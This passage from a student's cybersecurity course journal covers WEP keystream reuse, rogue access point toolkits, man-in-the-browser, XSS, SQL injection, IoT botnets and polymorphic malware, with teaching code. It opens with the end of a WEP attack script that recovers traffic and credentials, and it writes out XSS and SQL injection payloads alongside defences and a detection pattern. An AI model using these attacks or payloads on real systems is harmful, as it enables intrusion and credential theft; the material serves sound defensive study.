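    leaked_xor = xor(CAPTURE[1][3:], CAPTURE[2][3:])        # equals LOGIN XOR KNOWN
    plaintexts = decrypt_with_reused_iv(CAPTURE, known_frame, KNOWN)
    return leaked_xor, plaintexts, extract_basic_auth(plaintexts[0])

if __name__ == "__main__":
    _, texts, creds = run_attack()
    print(texts[0].decode(errors="replace"))
    print("credentials:", creds)
```

With only the 8-byte LLC/SNAP header known, the same call recovers just the first 8 bytes of every same-IV frame; the more plaintext the attacker can provoke (ARP requests are the classic choice), the more of each frame falls out, and a table of keystreams indexed by IV eventually decrypts the whole capture without ever learning the key.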

4.6. Analysis of Defcon22 conference


The Manna from Heaven toolkit combines mostly improved Karma attacks and
man-in-the-middle attacks, such as cookie capture, partial HSTS bypass, installation
of malicious iOS profiles, captive portal social engineering, credential stealing,
online check bypass and certificate sideloading. All of these are built on rogue AP
attacks, which put the cybercriminal in the path of the victim's device traffic. The
effects on wireless security are very drastic because this toolkit is oriented
towards removing the barriers that tech companies have been setting up to counter
rogue AP attacks. With this attack almost any kind of data can be stolen from a
person; for example with Firelamb, a feature present in the toolkit, the
cybercriminal can steal the credentials of multiple web services, such as Facebook,
Gmail or Amazon, by capturing the user's cookies. Unfortunately there is little that
a person can do to protect against these attacks; the most important
countermeasure is not to expose yourself, which means not using wireless networks
in very crowded public areas, deactivating the auto-connect option for any Wi-Fi
network and not saving any of these in your preferred network list.

The attacks present in the toolkit are especially dangerous because they are
relatively easy to carry out: any person with enough knowledge of networks and
Linux can download the software and execute the right commands to start getting
valuable information, even though the demo in the video did not work, apparently
due to the specific network situation at Defcon. A new rogue AP attack toolkit was
released as part of a Defcon 26 talk. This software is called w1f1 and specialises in
Wi-Fi hacking; it uses most of the features of the Manna from Heaven toolkit. The
documentation for this new program claims that it is a replacement for the
deprecated mana-toolkit, which means that the software presented back at Defcon 22
is no longer relevant.
5. Exploits and countermeasures
This week's topic was especially useful and interesting because nowadays a lot of different exploits are being used to commit illegal activities, and it is up to the developers and engineers to come up with mechanisms to fight this threat. I already had some knowledge about exploits and the different attack vectors that cyber-criminals use, but it was still good to get the concepts refreshed and to look at some real-life examples of attacks. It was also good to learn not only about the exploits but about the countermeasures as well, so that one can be prepared for any attack or malicious activity.

Personally, I am very familiar with injection attacks, SQL injection and XSS, due to some research I did back at my home university. The research was aimed at preventing web defacement by dynamically analysing the HTML and JavaScript code of a web page. As a matter of fact, the main causes of defacement are SQL injection and XSS, which can compromise the credentials or the authentication of the web page, allowing an intruder to modify its content.

5.1. What is a Man-in-the-browser attack?

A Man-in-the-browser (MitB) attack commonly uses a trojan horse to infect the web browser itself and modify pages in order to intercept transactions, either before they are rendered to the user or before they are submitted to the server. Because the trojan works inside the browser, after TLS has been terminated, neither the user nor the server sees anything unusual: the cybercriminal can steal account credentials or simply steal money by changing the payee or the amount of a transaction while the page still shows the user what they typed. Most of these attacks are carried out through browser plugins, extensions or helper objects. The Zeus trojan is closely connected to MitB because its web-inject mechanism has been one of the most used ways of infecting browsers in this way.

Some countermeasures have been developed to stop this kind of attack, for example field obfuscation, real-time encryption of sensitive fields, and fake keystrokes to defeat browser-based keyloggers. All of these strategies focus on hiding the sensitive information from the attacker. They are only partial, because a trojan that already controls the page can read a field after the user has filled it in; the stronger countermeasure is to verify the transaction over a channel the browser does not control.

Some Finnish banks have implemented such mechanisms, like two-step verification that asks the user to double-check on a separate device that it is really them making the transaction and that the transaction details are correct. The manual entry of randomly generated credentials into obfuscated fields is also used at banks like Osuuspankki.
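The difference between a confirmation code that is merely "a second step" and one that is bound to the transaction is the whole point against MitB. The following is an added example, not code from the journal or from the Rauti and Leppänen paper in reference [3]: it models in plain Python the user's intent, a browser that is either clean or carries a MitB web-inject, and a bank server that sends a confirmation code over a separate channel. The account numbers, the message format and the 6-digit HMAC-derived code are constructed for the demo.

```python
"""Transaction-bound out-of-band confirmation versus a Man-in-the-Browser.

Added example, not code from the journal or from reference [3]. Account
numbers, message format and code scheme are constructed for the demo.
"""
import hashlib
import hmac
import secrets
from dataclasses import dataclass
from typing import Callable, Dict, Optional, Tuple


@dataclass(frozen=True)
class Transfer:
    payee: str   # constructed IBAN-like strings, not real accounts
    amount: int  # in cents


def honest_browser(intent: Transfer) -> Transfer:
    """A clean browser submits exactly what the user typed."""
    return intent


def mitb_browser(intent: Transfer) -> Transfer:
    """A MitB web-inject rewrites the form on submit. The page the user sees
    still shows the original payee and amount; only the submitted data changes."""
    return Transfer(payee="FI00MULE00000000099", amount=intent.amount * 10)


class BankServer:
    """Issues a confirmation code bound to the transfer it actually received."""

    def __init__(self, show_details: bool) -> None:
        self.show_details = show_details      # does the OOB message carry payee/amount?
        self._key = secrets.token_bytes(32)   # server-side MAC key, never leaves the bank
        self._pending: Dict[str, Transfer] = {}

    def _code_for(self, t: Transfer) -> str:
        # The code is an HMAC over the exact payee and amount the server will execute,
        # so a code issued for one transfer cannot be reused to confirm another.
        msg = f"{t.payee}|{t.amount}".encode()
        mac = hmac.new(self._key, msg, hashlib.sha256).digest()
        return f"{int.from_bytes(mac[:4], 'big') % 1_000_000:06d}"

    def start_transfer(self, submitted: Transfer) -> dict:
        """Returns the out-of-band message, i.e. what the user's phone shows."""
        code = self._code_for(submitted)
        self._pending[code] = submitted
        oob = {"code": code}
        if self.show_details:
            # The crucial part: the separate channel shows the *server's* view.
            oob.update(payee=submitted.payee, amount=submitted.amount)
        return oob

    def confirm(self, code: str) -> Optional[Transfer]:
        """Executes the pending transfer whose bound code the user typed back."""
        return self._pending.pop(code, None)


def user_confirms(intent: Transfer, oob: dict) -> bool:
    """The user types the code back only if the displayed details match what
    they meant to send. A bare code gives them nothing to compare, so they approve."""
    if "payee" not in oob:
        return True
    return oob["payee"] == intent.payee and oob["amount"] == intent.amount


def run(browser: Callable[[Transfer], Transfer],
        show_details: bool) -> Tuple[bool, Optional[Transfer]]:
    """Returns (did the user approve?, transfer the bank executed or None)."""
    intent = Transfer(payee="FI1234567890123456", amount=10_000)  # 100.00 EUR, constructed
    bank = BankServer(show_details)
    oob = bank.start_transfer(browser(intent))
    if not user_confirms(intent, oob):
        return False, None
    return True, bank.confirm(oob["code"])


if __name__ == "__main__":
    for name, br in (("clean", honest_browser), ("MitB", mitb_browser)):
        for details in (False, True):
            approved, executed = run(br, details)
            print(f"{name:5} browser, details shown={details!s:5}: "
                  f"approved={approved}, executed={executed}")
```

With `show_details=False` the code behaves like a plain SMS one-time password: the MitB-altered transfer is approved and executed because the user has no way to see that the payee changed. With `show_details=True` the user sees the mule account and the tenfold amount on the other device and refuses, so nothing executes.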

5.2. Advanced persistent threats and targeted attacks

According to Imperva, an Advanced Persistent Threat (APT) is an attack campaign in which an intruder, or a team of intruders, establishes an illicit, long-term presence on a network in order to mine highly sensitive data. The targets are usually organisations, such as government agencies or large enterprises, and the initial foothold is often obtained through specific people in them, for example executives or senior officials. These attacks are also carried out by nation states against other nations. A recent example of an APT is Deep Panda, which in 2015 was linked to the breach of the US Government's Office of Personnel Management that compromised the personnel records of more than 4 million current and former federal employees. The attack was attributed in public reporting to China-linked actors, in the context of the ongoing cyber conflict between China and the US.

On the other hand, a targeted attack is a threat used by cyber-criminals to extract valuable information, like bank account credentials or credit card details. It is prepared through a process of social engineering in which personal information about the target is collected so that the attack looks as convincing as possible. The usual targets are not highly important people, in contrast to APTs. One example of a targeted attack is spear phishing, where the attacker sends the victim an email containing information relevant to them together with a malicious link or file; these can compromise the device on which they are opened or lead the user to malicious sites used to steal credentials and other valuable information.

5.3. What is XSS?

Cross-Site Scripting (XSS) is an attack in which the criminal takes advantage of a poorly built web application by injecting JavaScript code through an input field (or a URL parameter) that the application then echoes into a page without proper encoding. The injected script does not run on the server; it runs in the browser of every user who views the affected page, with the full privileges of the vulnerable site's origin, so it can read session cookies and other valuable information, rewrite the page, or send the user to a malicious site to be used in further illicit activity. Many web applications still fail to implement the measures that prevent this, which is why the attack is so dangerous. Over the years many countermeasures have been developed; most of them work, and they have reduced the incidence of the classic reflected and stored variants, although XSS remains one of the most common web vulnerabilities.
The most popular and effective countermeasures are input sanitation or validation, which rejects or cleans input containing unwanted characters or patterns; output encoding, which escapes the data when it is written into the page so that the browser reads it as plain text rather than as markup or code; and XSS prevention libraries, which package tested encoders for the different output contexts (HTML body, attribute, URL, JavaScript) so that they can easily be used in any web application. These countermeasures are used in web applications all over the world and have proven very effective in preventing Cross-Site Scripting. Their effectiveness relies on the fact that they are implemented on the server itself, where the page is built, rather than on filtering in the client; a Content Security Policy can be added as a second line of defence.
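To see why output encoding works where blacklist-style sanitisation fails, and why the right encoder depends on the output context, here is an added example (not code from the journal or from the paper in reference [1]). The rendering functions, the "naive sanitiser" and the payloads are constructed for the demo; the detector uses the standard-library HTML parser to decide whether a rendered fragment contains something a browser would execute.

```python
"""Output encoding per context versus blacklist sanitisation for XSS.

Added example, not code from the journal or from reference [1]. Rendering
functions, naive sanitiser and payloads are constructed for the demo.
"""
import html
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit


def naive_sanitize(text: str) -> str:
    """Blacklist-style 'input sanitation': strip <script> tags and nothing else."""
    return re.sub(r"<\s*/?\s*script[^>]*>", "", text, flags=re.I)


# --- HTML body context -------------------------------------------------------
def render_comment_vulnerable(comment: str) -> str:
    return f"<p>{naive_sanitize(comment)}</p>"


def render_comment_safe(comment: str) -> str:
    # Escape <, >, &, " and ' so the browser treats the data as text, not markup.
    return f"<p>{html.escape(comment, quote=True)}</p>"


# --- URL attribute context ---------------------------------------------------
def render_link_vulnerable(url: str, text: str) -> str:
    # Escaping alone is not enough here: "javascript:alert(1)" contains no special
    # characters, so html.escape() leaves it untouched and the browser runs it.
    return f'<a href="{html.escape(url, quote=True)}">{html.escape(text)}</a>'


def render_link_safe(url: str, text: str) -> str:
    # In a URL context the scheme must be whitelisted before escaping.
    if urlsplit(url).scheme.lower() not in ("http", "https"):
        url = "#"
    return f'<a href="{html.escape(url, quote=True)}">{html.escape(text)}</a>'


# --- Detector ---------------------------------------------------------------
class ScriptDetector(HTMLParser):
    """Flags <script> elements, on* event handlers and javascript: URLs.
    Escaped text never reaches handle_starttag, which is the whole point."""

    def __init__(self) -> None:
        super().__init__()
        self.found = False

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.found = True
        for name, value in attrs:
            if name.startswith("on"):
                self.found = True
            if name in ("href", "src") and value and value.strip().lower().startswith("javascript:"):
                self.found = True


def executes_script(rendered: str) -> bool:
    d = ScriptDetector()
    d.feed(rendered)
    d.close()
    return d.found


# Constructed payloads: the first is caught by the blacklist, the other two bypass it.
PAYLOADS = [
    "<script>alert(1)</script>",
    "<img src=x onerror=alert(document.cookie)>",
    "<scr<script>ipt>alert(1)</script>",
]


def compare(payload: str) -> dict:
    """Does the payload execute when rendered the vulnerable way / the safe way?"""
    return {
        "vulnerable": executes_script(render_comment_vulnerable(payload)),
        "safe": executes_script(render_comment_safe(payload)),
    }


if __name__ == "__main__":
    for p in PAYLOADS:
        print(f"{p!r:45} -> {compare(p)}")
    print("link, vulnerable:", executes_script(render_link_vulnerable("javascript:alert(1)", "pay")))
    print("link, safe      :", executes_script(render_link_safe("javascript:alert(1)", "pay")))
```

The third payload shows the classic problem with blacklists: stripping `<script>` from `<scr<script>ipt>` leaves `<script>` behind. The link functions show the other half of the lesson: `html.escape` is the right tool in the HTML body but the wrong tool on its own inside `href`, where the scheme must be validated first.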

5.4. IoT and common vulnerabilities

Nowadays the Internet of Things trend is at its peak, and billions of IoT devices are in use all over the world. What many users do not know is that these devices have major security flaws and are very vulnerable to cyber-attacks. The most relevant vulnerabilities identified are: a lack of network security, caused by performance and power constraints, since most of the devices run on batteries or have little computational power, which makes it hard to run the security protocols that rely on heavier algorithms and encryption; faulty authentication, caused by the use of weak and default passwords; and the lack of regular software and firmware updates and security patches, which plays a great role in this problem.

One of the most harmful incidents in which IoT devices were involved was the Mirai botnet. Hundreds of thousands of devices, mainly IP cameras and home routers, were infected by malware that logged into them over Telnet using a short list of factory default usernames and passwords, turning them into zombies of a massive botnet that was used to launch several DDoS attacks. The attack on the DNS provider Dyn in October 2016 made a great number of important services unreachable, among them GitHub, Twitter, Netflix and Airbnb.
6. Software and system security
The topics addressed in these two weeks were very important to me, because as a software engineer the safety and wellbeing of the users of my products is one of my primary concerns. The techniques and the different research papers presented were of much help in understanding the current state of software security and in getting a look at the newest and greatest breakthroughs in the security field. One topic that was especially interesting was the research on agile and security, because nowadays almost every software company is implementing some kind of agile methodology to develop software, like Scrum or Kanban, so a lot of programs and services are launched to the market using these techniques, and if there is a security flaw a great number of users will be affected. With the findings in the presented papers software engineers can implement better practices and improve the current ones to guarantee a product of high quality.

6.1. Security tools and mechanisms

Nowadays software is everywhere and touches every activity people do; big companies and governments use it to build large and complex information systems that make the job of storing, searching and deleting data easier. Because of this trend of digitising information, software security has become an important topic in the technology industry, and multiple mechanisms have been developed to ensure the safety of software systems. These mechanisms can be divided into four categories: the ones that improve the security of the software itself, the ones that prevent attacks, the ones that detect intruders and the ones that defeat attacks. Some examples are firewalls, encryption, automated testing and beta testing, intrusion detection systems (IDS) and intrusion prevention systems (IPS), and honeypotting.

The most interesting mechanism among those named above is honeypotting. This is a way of learning from attacks by setting up a fake environment of resources in a computer network. Basically, honeypotting is the practice of placing honeypots, that is, devices or services set up to act as a trap for attackers, and then studying what the attackers do to them. Cyber-criminals usually think they are hitting a real victim, so they use their hacking techniques and attack vectors to crack the system, not knowing that they are being monitored and learned from; this allows security engineers to develop countermeasures for the vulnerabilities the attackers are focusing on. Honeypotting is mostly used to learn about more sophisticated attacks like APTs. Two practical points follow from the definition: since no legitimate user has any reason to touch a honeypot, any interaction with it is a high-fidelity alert, and the honeypot must be isolated from the real systems so that an attacker who compromises it cannot use it as a pivot.

6.2. What is Ransomware?

Ransomware is a type of malware that encrypts information valuable to the victim and restricts access to certain services. The main goal of this attack is to earn money, usually through Bitcoin payments, in exchange for the key that releases the affected files or device. Most of the time the cyber-criminals give the victim a limited amount of time to make the payment, and they threaten that if the transaction is not made all the files and data being held will be permanently deleted. This malware has affected many companies and important organisations like hospitals or airports, which rely heavily on their information services; offline, tested backups are the main measure that keeps such an organisation from having to choose between paying and losing the data.

One of the most harmful ransomware outbreaks has been WannaCry, which in May 2017 affected more than 141,000 computers all over the world and compromised many public organisations and companies, among them hospitals and a natural gas company. The worm spread through a known vulnerability in the SMBv1 service of Windows (the one fixed by the MS17-010 update and exploited by EternalBlue); the affected computers had not installed the patch, which had been released two months earlier, or ran versions of Windows that no longer received updates, which left them defenceless against the cyber-criminals.

6.3. How does malware hide from antimalware software?

Malware such as viruses, worms, trojans or ransomware is specially designed to hide from antimalware software, so that the intruder can stay inside the victim's device as long as possible to cause more damage or accomplish a final goal. Some of the most popular techniques used to conceal the existence of malware on a device are compression, self-encryption, polymorphism, metamorphism and entry point obscuring.
The most interesting of these is polymorphism. A polymorphic virus stores its body encrypted and leaves only a small piece of code, the decryptor, in plain form, so that the body can be recovered at run time. In addition, a mutation engine is present inside the virus: every time the malware infects a new file the engine generates a new encryption key, encrypts a fresh copy of the body with it, and then rewrites the decryptor so that its functionality remains the same but its implementation is different. Most of the time the engine only inserts instructions that have no functional effect, or swaps instructions for equivalent ones, but this is enough to change the byte pattern of every copy, so a fixed signature never matches two infections. The weakness of the scheme is that the decrypted body is still identical in every copy, which is why scanners emulate the decryptor in a sandbox and scan the result. Metamorphic malware, such as Zmist (described in reference [4]), goes one step further and rewrites the body itself, even mixing its code into the host program's instructions, so there is no constant body to decrypt.
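The mechanics of the mutation engine, and why emulation still catches its output, can be shown with a toy. The following is an added example, not code from the journal or from the Virus Bulletin article in reference [4], and it is not malware: the "body" is an inert byte string and the "decryptor" is a made-up two-byte bytecode interpreted in Python. The opcodes, the encryption (XOR with a key byte followed by an additive constant) and the sample layout are all constructed for the demo.

```python
"""Toy polymorphic decryptor: why byte signatures fail and emulation does not.

Added example, not code from the journal or from reference [4], and not
malware. Body, bytecode and layout are constructed for the demo.
"""
import hashlib
import secrets
from typing import List, Tuple

BODY = b"inert demo body standing in for the virus code; identical in every generation"
KNOWN_BODY_HASH = hashlib.sha256(BODY).hexdigest()   # what a scanner would have on file

# Decryptor bytecode: one 2-byte instruction (opcode, operand) per entry,
# applied in order to every byte of the encrypted body; END (0x00) closes the stub.
END, SUB, ADD, XOR, NOP = 0x00, 0x01, 0x02, 0x03, 0x90


def encrypt_body(key: int, delta: int) -> bytes:
    """enc = ((b ^ key) + delta) mod 256, with a fresh key/delta per generation."""
    return bytes(((b ^ key) + delta) & 0xFF for b in BODY)


def mutation_engine(key: int, delta: int) -> List[Tuple[int, int]]:
    """Emit a decryptor that undoes encrypt_body() using a randomly chosen but
    equivalent instruction sequence, padded with junk NOPs."""
    ops: List[Tuple[int, int]] = []

    def junk() -> None:
        for _ in range(secrets.randbelow(3)):
            ops.append((NOP, secrets.randbelow(256)))

    junk()
    # "subtract delta" as either SUB delta or ADD (256 - delta)
    if secrets.randbelow(2):
        ops.append((SUB, delta))
    else:
        ops.append((ADD, (256 - delta) & 0xFF))
    junk()
    # "xor key" either directly or split across two XORs that combine to key
    if secrets.randbelow(2):
        ops.append((XOR, key))
    else:
        r = secrets.randbelow(256)
        ops.append((XOR, r))
        junk()
        ops.append((XOR, r ^ key))
    junk()
    return ops


def generate() -> bytes:
    """One infection: new key, new delta, new decryptor, new encrypted body."""
    key, delta = 1 + secrets.randbelow(255), secrets.randbelow(256)
    stub = b"".join(bytes(op) for op in mutation_engine(key, delta)) + bytes([END, 0])
    return stub + encrypt_body(key, delta)


def emulate(sample: bytes) -> bytes:
    """What an antivirus emulator does: run the stub on the body it carries."""
    ops, i = [], 0
    while sample[i] != END:
        ops.append((sample[i], sample[i + 1]))
        i += 2
    body = bytearray(sample[i + 2:])
    for idx, b in enumerate(body):
        for opcode, imm in ops:
            if opcode == SUB:
                b = (b - imm) & 0xFF
            elif opcode == ADD:
                b = (b + imm) & 0xFF
            elif opcode == XOR:
                b ^= imm
            # NOP: junk inserted by the engine, no effect
        body[idx] = b
    return bytes(body)


def shares_signature(a: bytes, b: bytes, n: int = 8) -> bool:
    """Static signature check: do the two samples share any n-byte sequence?"""
    grams = {a[i:i + n] for i in range(len(a) - n + 1)}
    return any(b[i:i + n] in grams for i in range(len(b) - n + 1))


def detect_by_emulation(sample: bytes) -> bool:
    """Dynamic check: decrypt in the sandbox, then match the constant body."""
    return hashlib.sha256(emulate(sample)).hexdigest() == KNOWN_BODY_HASH


if __name__ == "__main__":
    g1, g2 = generate(), generate()
    print("static signature shared:", shares_signature(g1, g2))
    print("emulation detects both :", detect_by_emulation(g1) and detect_by_emulation(g2))
```

Every call to `generate()` yields a sample whose stub and encrypted body differ from the previous one, so no 8-byte signature carries over, yet `emulate()` recovers the same body from each and the hash match fires. Real engines vary registers and instruction order and spread the stub across the host, but the detection logic is the same.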

6.4. System functionality, attack propagation and detection in dependent systems

A good example in which multiple dependencies between different modules and systems exist is a web application. Most of them are based on the MVC pattern, which gives the software a clean architecture by having three main components, the model, the view and the controller, each with well-defined responsibilities. One of the most important relationships in a web application is the one between the user interface and the business logic: the user makes requests that travel to the backend, where they are processed by the controller, which uses the functionality and data of the model. Here the user interface depends on the server to get the information it displays, and the server depends on the user interface to get the user input it needs to carry out its operations.

Some of the most common attacks on web applications are SQL injection and XSS. Both use the user interface as the entry point, injecting SQL fragments or JavaScript code to alter the behaviour of the server or to retrieve valuable information, such as credit card data, from the database. After one of these attacks the functionality of the system can look unchanged to the user, while internally the server or the stored content has been modified and no longer works as it was programmed. For example, a simple injected script can change a page that sends the user to a payment form into one that sends them to a fake page which captures their credentials.
Regarding propagation, the attack is limited to the specific web application that was hit, but the damage to the server can be considerable if the injected code gets past all the filters and detection mechanisms that should be implemented in the application.
The attack starts at the user interface and moves from component to component until it reaches the backend, where the damage is done. Detection should be feasible, because most web applications today have input validation that rejects and alerts on likely injection attempts, and a web application firewall in front of the server can analyse each request and decide whether it is benign. However, filters can be bypassed, so the reliable fix is structural: parameterised queries for the database and context-aware output encoding for the pages, so that user input can never be interpreted as SQL or as script.
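The SQL side of the propagation path described above, from a form field to the model's database, is easy to demonstrate end to end. The following is an added example, not code from the journal: an in-memory SQLite database with constructed users and fake card numbers, a login function that builds its query by string concatenation, the parameterised version of the same function, and a request-level filter of the kind a WAF or input validation layer applies. Passwords are stored in clear only to keep the demo short; a real system stores password hashes.

```python
"""SQL injection through the user interface, and the structural fix.

Added example, not code from the journal. All data is constructed.
"""
import re
import sqlite3
from typing import List


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT, card TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [("alice", "correct horse", "4111-0000-0000-1111"),   # constructed data
         ("bob", "hunter2", "5500-0000-0000-2222")],
    )
    return conn


def login_vulnerable(conn: sqlite3.Connection, user: str, pw: str) -> List[str]:
    """Builds the query by concatenation: the input is parsed as SQL."""
    query = (f"SELECT username FROM users "
             f"WHERE username = '{user}' AND password = '{pw}'")
    return [row[0] for row in conn.execute(query)]


def login_safe(conn: sqlite3.Connection, user: str, pw: str) -> List[str]:
    """Parameterised query: the driver passes values separately from the SQL
    text, so a quote or a keyword in the input is just data."""
    return [row[0] for row in conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?", (user, pw))]


# A request-level filter of the kind a WAF or input validation layer applies.
# Useful for alerting, but it is a heuristic, not the fix.
SQLI_PATTERN = re.compile(r"'\s*(or|and|union)\b|--|;|/\*", re.I)


def looks_like_sqli(value: str) -> bool:
    return bool(SQLI_PATTERN.search(value))


# Constructed attack inputs typed into the login form.
BYPASS_USER = "' OR '1'='1"                        # authentication bypass
EXFIL_USER = "x' UNION SELECT card FROM users --"  # pulls card numbers into the result


if __name__ == "__main__":
    db = make_db()
    print("bypass, vulnerable:", login_vulnerable(db, BYPASS_USER, BYPASS_USER))
    print("bypass, safe      :", login_safe(db, BYPASS_USER, BYPASS_USER))
    print("exfil,  vulnerable:", login_vulnerable(db, EXFIL_USER, "x"))
    print("exfil,  safe      :", login_safe(db, EXFIL_USER, "x"))
    print("filter flags      :", [looks_like_sqli(v) for v in (BYPASS_USER, EXFIL_USER, "O'Brien")])
```

The bypass input turns the `WHERE` clause into one that is true for every row, so the vulnerable login returns all users; the `UNION` input makes the same query return the card column instead, which is exactly the "credit card data from the database" case above. The parameterised function returns nothing for both because the whole string is compared as a username. The filter flags both payloads and leaves a legitimate name like O'Brien alone, but it is there to raise an alert, not to replace the parameterised query.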
7. Conclusion
During the course I was able to learn new topics like WLAN and software security and improve my knowledge of the ones I already knew, like malware and exploits. One subject that I was able to understand better was encryption; I got the chance to see how it works and by which operations it is made possible, mainly through cryptography. Thanks to the practical component of the course I was able to learn about many different tools related to cyber security, like hex editors, Wireshark and Aircrack-ng, among others. All the information provided by the professors was very clear and they always presented the connection between every discussed topic, so we could understand how each one fits into system and application security.

Personally, I found interesting the lecture about malware, because as I said before
I had a basic knowledge about this topic but not the full picture of how malware
actually works and what types exist. With the explanation of the professors and the
material presented for the lecture I learned that viruses are not the only kind of
malware and that there are multiple ways malware can hide even from the most
sophisticated antimalware software. Another interesting point was that when
starting a new topic, the professor always talked about the background of the topic
and not only the topic itself, how it started and why it was developed. In my opinion
this helps to create a perspective on why and how the technology keeps evolving.
Something that I didn't like about the course was that we didn't have a practical exercise for every assignment; personally I enjoy applying the theory to a concrete problem to help the ideas sink in better. For example, it was very interesting to use the knowledge about malware to try to fix the broken PE file, even though my group couldn't fix it.

My knowledge about cyber security has improved drastically. When I started the course I only had a basic understanding of most of the topics covered in the lectures; now, thanks to the group work and the materials provided by the professors, I have been able to develop a deeper knowledge base. The understanding I used to have of security was incomplete and composed of different parts without any connection between them; I only knew basic concepts of isolated topics I had picked up during other courses. Also, all my knowledge was theoretical and I had never tried or seen these concepts in action, but now I have not only built a bigger picture of the topic in general and gotten a much clearer understanding of the addressed subjects, but I have seen them in practice and have been able to interact with them and apply them to solve different problems.
8. References
[1] J. Ruohonen and V. Leppänen, "A Case-Control Study on the Server-Side Bandages Against XSS", SQAMIA 2018. Retrieved in October 2019 from https://moodle.utu.fi/pluginfile.php/996636/mod_resource/content/1/SQAMIA_2018_Ruohonen.pdf

[2] S. Rauti and S. Laurén, "Honeypot, Sandbox, and Monitoring", UTU WP4 Cybertrust final report, 2017. Retrieved in October 2019 from https://moodle.utu.fi/pluginfile.php/825952/mod_resource/content/0/UTU_WP4_3cybertrust_final_report_20170616.pdf

[3] S. Rauti and V. Leppänen, "Man-in-the-Browser Attacks in Modern Web Browsers", in Emerging Trends in ICT Security, 2014, pp. 469-480.

[4] P. Ferrie and P. Szor, "Zmist Opportunities", Virus Bulletin, pp. 6-7, March 2001.
9. Appendices
9.1. Minutes of the meeting #4
Group Work assignment 4
Place: Quantum Building UTU
Date and time: 10/10/2019
Chairperson: Juan Giraldo
Present: Juan Giraldo, Luke Skeen, Melissa Welander, Heta Pärssinen, Fredrik
Brushane.
Not Present:
Summary of meeting participation after this meeting:
Juan Giraldo has missed 0 meetings
Luke Skeen has missed 0 meetings
Melissa Welander has missed 0 meetings
Heta Pärssinen has missed 0 meetings
Fredrik Brushane has missed 1 meeting

Chairperson opened the meeting at 10:00.

Discussion of the researched topics:


The meeting started by talking about our findings on the topics that were proposed for research. First Juan gave a general definition of APTs, then Luke and Fredrik helped to complete it by sharing their own findings. The spreading and mitigation strategies were also discussed, and it was concluded that exploits like SQL injection and XSS are the most used tools to spread the APT. Also, some mitigation strategies were recognised as the better ones, for example traffic monitoring, web application firewalls, whitelisting, strict update policies and encryption of sensitive data; Luke mentioned two-factor authentication and Fredrik proposed restricting the hardware that employees use inside the company, like laptops and USB thumb drives.

Some famous APT attacks were shared in the meeting: Juan talked about NetTraveler, Titan Rain and GhostNet, and Luke and Heta talked about ShadowHammer.
The man-in-the-browser threat was also addressed. First the general definition was discussed among the team, then it was concluded that the Zeus trojan is connected to the MitB attack because the trojan is how the attack takes place; basically the trojan implants the malware in the browser. Some discussed countermeasures were field obfuscation and real-time encryption of sensitive fields. Various cases of attacks and vulnerabilities were found by the group members; the most relevant were the pacemaker vulnerability, the drug infusion pump security breach, the hijacking of hospital networks and the hacking of heart rate monitors.

The group concluded that in those cases the lack of network security and of a system that allows a secure connection between the device and the real user are the reasons why there were vulnerabilities. The information was retrieved from:
https://www.alpinesecurity.com/blog/most-dangerous-hacked-medical-devices

Group work:
Activity 1:
The proposed definitions for each attack were:

Advanced Persistent Threats:


APT is an attack campaign in which an intruder, or team of intruders, establishes an
illicit long-term presence on a network in order to mine highly sensitive data. The
targets of the attack are very carefully chosen, these are normally large enterprises
or governmental networks. Some examples are NetTraveler, Titan Rain, GhostNet
and shadow-hammer.

Targeted Attacks:
A targeted attack refers to a type of threat in which threat actors actively pursue and
compromise a target entity’s infrastructure while maintaining anonymity. These
attackers have a certain level of expertise and have enough resources to conduct
their schemes over a long-term period. They can adapt, adjust, or
improve their attacks to counter their victim’s defences. Ginwui and
the PPDropper Trojans are some examples of targeted attacks.

Activity 2:
Cross-Site Scripting is a cyber-attack that consists of injecting malicious code in the form of JavaScript scripts that will be run by the server when the cybercriminal inputs the code in some input field. Some countermeasures are input sanitation, input validation, blacklisting of disallowed characters, encoding, content security policies and XSS prevention libraries.

Activity 3:
Some of the challenges of securing IoT devices are that normal wireless security mechanisms cannot be used for this technology due to the low data rates they use, and that computing capacity is very limited, so the most common security algorithms cannot run on the devices. One example of a security breach on these devices is the Mirai attack, in which a lot of IoT devices were infected and converted into bots that could perform massive DDoS attacks against big companies like Netflix or Amazon.

Chairperson closed the meeting at 11:46.
